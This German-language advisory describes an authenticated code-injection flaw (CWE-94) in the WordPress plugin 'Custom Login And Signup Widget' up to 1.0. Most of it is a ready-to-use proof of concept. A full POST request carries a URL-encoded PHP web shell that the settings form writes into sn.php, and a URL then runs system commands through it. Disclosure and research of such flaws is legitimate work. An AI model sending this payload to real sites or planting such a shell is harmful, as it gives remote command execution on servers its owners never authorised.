
WordPress Custom Login And Signup Widget Plugin <= 1.0 ist anfällig für Arbitrary Code Execution
Unsachgemäße Kontrolle der Codegenerierung ('Code Injection') Schwachstelle im bitto.Kazi Custom Login And Signup Widget ermöglicht beliebige PHP-Codeausführung durch authentifizierte Administratoren.
Dieses Problem betrifft alle Versionen bis einschließlich 1.0.
🔥 Basis-Score: 9.1 (KRITISCH)
CWE-ID: CWE-94 – Unsachgemäße Kontrolle der Codegenerierung ('Code Injection')
Das Plugin erlaubt Administratoren, den Inhalt von sn.php über das Feld Sender’s Name in den Einstellungen zu ändern.
Die vom Benutzer bereitgestellten Eingaben werden direkt in eine PHP-Datei geschrieben, ohne Bereinigung oder Validierung.
Daher wird jeder PHP-Code, der im Parameter text übergeben wird, in eine PHP-Datei gespeichert und bei direktem Zugriff ausgeführt, was zu Remote Code Execution (RCE) führt.
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (Plugin-Konfiguration include)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
Nach erfolgreicher Injektion kann die Datei direkt aufgerufen werden, um Befehle auszuführen via:
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php-Dateien geschrieben werden.Dieses Projekt dient ausschließlich zu Bildungs- und Forschungszwecken.
Jegliche Nutzung der bereitgestellten Informationen erfolgt auf eigenes Risiko.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch diesen Inhalt verursacht werden.